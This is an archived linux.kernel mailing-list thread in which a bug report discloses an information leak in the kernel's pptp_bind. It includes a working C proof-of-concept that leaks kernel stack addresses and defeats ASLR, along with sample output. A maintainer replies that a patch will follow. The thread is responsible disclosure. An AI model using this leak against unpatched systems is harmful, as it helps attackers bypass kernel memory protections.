Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]


Groups > linux.kernel > #1291087 > unrolled thread

Information leak in pptp_bind

Started byDmitry Vyukov <dvyukov@gmail.com>
First post2015-12-14 11:40 +0100
Last post2015-12-14 23:50 +0100
Articles 2 — 2 participants

Back to article view | Back to linux.kernel


Contents

  Information leak in pptp_bind Dmitry Vyukov <dvyukov@gmail.com> - 2015-12-14 11:40 +0100
    Re: Information leak in pptp_bind Hannes Frederic Sowa <hannes@stressinduktion.org> - 2015-12-14 23:50 +0100

#1291087 — Information leak in pptp_bind

FromDmitry Vyukov <dvyukov@gmail.com>
Date2015-12-14 11:40 +0100
SubjectInformation leak in pptp_bind
Message-ID<qFyHV-4U5-59@gated-at.bofh.it>
Hello,

The following program leak various uninit garbage including kernel
addresses and whatever is on kernel stack, in particular defeating
ASLR. The issue is in pptp_bind which does not verify sockaddr_len

#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/in6.h>
#include <linux/socket.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
        struct sockaddr sa;
        unsigned len, i, try;
        int fd;

        for (try = 0; try < 5; try++) {
                fd = socket(AF_PPPOX, SOCK_RAW, PX_PROTO_PPTP);
                if (fd == -1)
                        return;
                memset(&sa, 0, sizeof(sa));
                bind(fd, &sa, 0);
                len = sizeof(sa);
                getsockname(fd, &sa, &len);
                for (i = 0; i < len; i++)
                        printf("%02x", ((unsigned char*)&sa)[i]);
                printf("\n");
        }
        return 0;
}

# ./a.out
1800020000004700c012833d00880000b002400000000000005eddc66d2b
1800020000004800408bf13a00880000b002400000000000005eddc66d2b
180002000000490080a5f13a00880000b002400000000000005eddc66d2b
1800020000004a00008ff13a00880000b002400000000000005eddc66d2b
1800020000004b008096f13a00880000b002400000000000005eddc66d2b
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/

[toc] | [next] | [standalone]


#1291655

FromHannes Frederic Sowa <hannes@stressinduktion.org>
Date2015-12-14 23:50 +0100
Message-ID<qFK6m-3W4-23@gated-at.bofh.it>
In reply to#1291087
On 14.12.2015 11:38, Dmitry Vyukov wrote:
> The following program leak various uninit garbage including kernel
> addresses and whatever is on kernel stack, in particular defeating
> ASLR. The issue is in pptp_bind which does not verify sockaddr_len.

Thanks for the report!

I send out a patch soon.


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/

[toc] | [prev] | [standalone]


Back to top | Article view | linux.kernel


csiph-web